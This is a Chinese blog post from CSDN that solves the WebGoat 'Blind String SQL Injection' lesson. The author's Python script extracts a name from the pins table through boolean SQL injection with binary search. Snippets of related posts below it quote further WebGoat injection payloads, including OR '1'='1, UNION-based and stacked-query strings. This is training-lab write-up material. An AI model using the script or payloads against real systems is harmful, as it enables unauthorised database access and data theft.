webgoat 中 Blind String SQL Injection 的 Python 编程解决

最新推荐文章于 2023-11-05 23:00:03 发布
原创 最新推荐文章于 2023-11-05 23:00:03 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #webgoat

本文介绍了一个使用Python进行SQL注入攻击的实例。通过构造特定的SQL查询字符串并利用Python的网络请求库,实现了对目标网站的有效攻击,成功获取了指定的数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决.

Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理. 

在这期间发现简单的算法都不熟了, 汗.

以下是代码

#!/usr/bin/python
#author: dengzhaoqun
#date: 2013-03-08
#email: dengzhaoqun@163.com

import urllib
import urllib2
import sys

url= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
result = '<p>Account number is valid</form></div>'

def isValid(str):
    params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})
    req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
    f = urllib2.urlopen(req)
    content = f.read()
    ret = content.find(result)
    if(ret == -1):
        return False
    return True


#get name len
lenMax = 100
lenMin = 1

while(lenMax > lenMin):
    #print lenMax, lenMin
    len = (lenMax + lenMin) / 2
    str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)
    #print str
    valid = isValid(str)
    if( not valid):
        lenMin = len + 1
    else:
        lenMax = len

print "--- name len: %d ---" %lenMax        


# get name
name = ''
for i in range(1, lenMax + 1):
    charMax = 122  # 'z'
    charMin = 65 # 'A'
    while(charMax > charMin):
        #print chr(charMax), chr(charMin)
        char = (charMax + charMin) / 2
        str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))
        #print str
        valid = isValid(str)
        if( not valid):
            charMin = char + 1
        else:
            charMax = char
    name += chr(charMax)

print '--- name: %s ---' % name
运行结果如下
--- name len: 4 ---
--- name: Jill ---
"Jill" 即是所求的 name .



Blind Numeric SQL Injection练习的一些关键点记录(WebGoat5.4)
软件生命周期中的攻防博弈
09-02 2145
SQL盲注与SQL普通注入的原理一样,区别是普通注入可以有结果集返回(查询结果,错误信息提示等),盲注的执行结果要么是TRUE要么是FALSE,提示信息的缺乏也使盲注的难度相对高一些。 本Lesson的目标:The goal is to find the value of the field pin in table pins for the row with the cc_number of
WebGoat——盲注
OOM
08-14 2132
工具介绍:盲注可以通过人工去做,但是成本太高,Webgoat提供一个工具Simple JHijack(下载地址),通过与Tamper Data(使用方法)的结合使用,能够完成部分盲注。 界面介绍: 具体的实施 1、Webgoat——Blind Numeric SQL Injection The form below allows a user to enter an account
Blind SQL injection sample
kezhen的专栏
04-06 2247
WebGoat中的Blind Numeric SQL InjectionBlind String SQL Injection 两个例子
DVWA下的SQL Injection(Blind)
07-25
盲注
WebGoat SQL注入解题思路
Abracadabra的专栏
09-20 6145
WebGoat SQL注入解题思路 ★ 启动 WebGoat java -jar webgoat-server-8.0.0.M21.jar ★ 打开 WebGoat 网站 http://127.0.0.1:8080/WebGoat/ 注意大小写。 ★ 题目1:String SQL Injection 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesso...
WebGoat通关之SQL Injection (intro)的学习
weixin_45466962的博客
04-08 1843
WebGoat通关之SQL Injection (intro)的学习 1.启动WebGoat 在启动WebGoat8.1.0后,在浏览器中输入网址http://127.0.0.1:8080/WebGoat进入WebGoat项目,点击侧边栏Injection,选择SQL Injection (intro)进入简单SQL注入练习,如图: 如果英文看不懂的话我们可以右击浏览器选择翻译成中文的功能 2.SQL Injection (intro)练习 2.1 What is SQL? 这是一个简单的sql查询语句的
WebGoat SQL Injection (advanced) 5
m0_47717028的博客
05-04 1290
本文参考了webgoat全关教程手册_维梓梓的博客-优快云博客_webgoat教程和WebGoat通关攻略(持续更新)_我只是个混子的博客-优快云博客_webgoat教程的解题思路! 最近 在做webgoat上的sql注入,以此来缓解我焦虑的心(毕竟现在课少又加上疫情也没办法实习,更重要的是我清楚自己能力不行,所以实在焦虑)。前面的一些题感觉做得比较得心应手,而到了这一题感觉开始给我动真格了,看大佬的解析都看不懂了。 先根据大佬们的解题思路走一遍: ...
Webgoat5中的String SQL Injection中写入的:Smith' OR '1'='1是什么意思
06-12
Webgoat5中,"String SQL Injection"是一种攻击技术,攻击者可以通过在输入框中插入恶意代码来绕过应用程序的安全机制,从而执行任意的SQL查询。 具体来说,这个攻击是通过利用应用程序对用户输入的不充分验证,...
面试必备:WebGoat实战通关指南!一(General、Injection)
最新发布
03-22
webgoat通关【2024年WebGoat8.2.2通关记录一(General、Injection)简介】 内容概要: 本文为网络安全初学者提供了一个全面的学习指南,通过通俗易懂的语言,介绍了WebGoat8.2.2版本的General和Injection两个关卡的...
WebGoat通关攻略与详细解析——SQL Injection(intro)篇
qq_43739482的博客
10-18 5673
WebGoat靶机通关攻略,详细描述了题目的要求、解题思路和过程、通关答案。
webgoat之注入篇
qq_43571759的博客
02-26 1978
webgoat之注入缺陷篇: 1.command injection 我也不知道怎么就做好了,就随便点了两下就好啦,想重置一下也不行,可能,是个bug… 2.Numeric SQL Injection 看下题目要求,英语不好的同学去谷歌翻译查,不要看一些教程上的,因为会撇到答案影响自己的思路: 下面的表格允许用户查看天气数据。 尝试注入一个SQL字符串,该字符串将导致显示所有天气数据。 现在,...
webgoat-(A1)SQL Injection
seanyang_的博客
11-05 1558
SQL 命令主要分为三类:数据操作语言 (DML)DML 语句可用于请求记录 (SELECT)、添加记录 (INSERT)、删除记录 (DELETE) 和修改现有记录 (UPDATE)。如果攻击者成功地将 DML 语句“注入”到 SQL 数据库中,则可能会破坏系统的机密性(使用 SELECT 语句)、完整性(使用 UPDATE 语句)和可用性(使用 DELETE 或 UPDATE 语句)数据定义语言 (DDL)DDL 命令通常用于定义数据库的架构。
WebGoat (A1) SQL Injection (mitigation)
箭雨镜屋
03-05 3389
第5页
20145308 《网络对抗》Web安全基础实践 学习总结
weixin_30731287的博客
05-14 163
20145308 《网络对抗》 Web安全基础实践 学习总结 实验内容 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。 基础问题回答 (1)SQL注入攻击原理,如何防御 通过在文本框中输入的字符串与web中事先定义好的SQL语句结合,构成注入攻击的SQL实现攻击 主要还是通过编程时多多实现对输入字符串的合法性检验 (2)XSS攻击的原理,如何防御 通过对网页...
WebGoat——SQL injection
OOM
08-09 4532
1、Stage 1 Stage 1: Use String SQL Injection to bypass authentication. Use SQL injection to log in as the boss ('Neville') without using the correct password. Verify that Neville's profile can be view
WebGoat笔记】之五 --- Injection Flaws
weixin_30466421的博客
06-21 430
主要内容: SQL注入,Log注入 Command Injection.. 2 Numeric SQL Injection.. 2 Log Spoofing.. 2 XPATH Injection.. 2 LAB: SQL Injection.. 3 Stage 1: String SQL Injection.. 3 Stage 2: Parameterized Que...
WebGoat (A1) SQL Injection (advanced)
箭雨镜屋
03-01 4369
第3页 第一种 Dave' union select userid,user_name,password,cookie,'5','6',7 from user_system_data-- ss 第二种 1';select * from user_system_data-- ss 第5页
20145306 网路攻防 web安全基础实践
baibishou40950846的博客
05-14 320
20145306 网路攻防 web安全基础实践 20145306 网络攻防 web安全基础实践 实验内容 使用webgoat进行XSS攻击、CSRF攻击、SQL注入 XSS攻击:Stored XSS Attacks、Reflected XSS Attac...
WebGoat使用指南
Tasfa的博客
10-06 9368
注意:安装WebGoat默认需要tomcat和java环境的支持 1、下载WebGoat-5.4-OWASP_Standard_Win32.zip(http://code.google.com/p/webgoat/downloads/list), 下载WebGoat-5.4-OWASP_Standard_Win32.zip,自带环境。 2、解压缩到当前文件夹 3、设置浏览器代理127.0.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值